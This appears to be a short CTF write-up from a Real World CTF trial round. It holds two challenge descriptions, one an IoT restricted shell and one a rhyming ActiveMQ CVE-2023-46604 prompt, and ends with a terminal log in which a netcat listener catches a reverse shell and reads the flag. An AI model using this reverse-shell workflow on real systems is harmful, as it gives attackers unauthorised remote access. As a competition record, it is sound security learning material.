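With nothing much to do, I signed up for the trial competition, which is only about 40% as difficult as the international contest. I took a quick look at the challenges and, well, could not solve a single one. But then I figured that Real World probably tests recent CVEs; in the end I solved 4 challenges and ranked quite high, which felt pretty good. Also, Be-an-Interpreter-Hacker should be CVE-2023-28879, but I did not succeed…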
This is the debug console of an IoT device. The device is not intended to provide the shell. For debugging purposes, the vendor provides a protected shell to execute basic debug commands. Are you able to access the unrestricted shell for this device?
Welcome, seekers, to the game, Where ActiveMQ’s name is not the same. In this world of messages and queues, A hidden flaw, in the news.
CVE-2023-46604, a code that’s key, A vulnerability, you’ll soon see. In this challenge, you are tasked, To uncover secrets, masked and masked.
Explore the depths of ActiveMQ’s lair, Where messages flow with utmost care. But within this stream, a flaw does lie, A door unlocked, beneath the sky.
Your mission, should you dare to dive, Is to find this flaw, make it alive. Exploit the gap, show your skill, In this cyber world, where time stands still.
This is your chance to learn and probe, In a digital world across the globe. Seek the flaw in ActiveMQ’s core, And open the door to cybersecurity lore.
So embark on this quest, both far and nigh, Where codes and messages, in layers lie. Find the key to CVE’s mystery, And etch your name in cyber history!
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvp 5000
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::5000
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
activemq@76390a168383:~$ cd /
activemq@76390a168383:/$ ./readflag
rwctf{N0w_Y0ur_4r3_G0od_H4ck3r_6d6}
Participate in a security vulnerability emergency response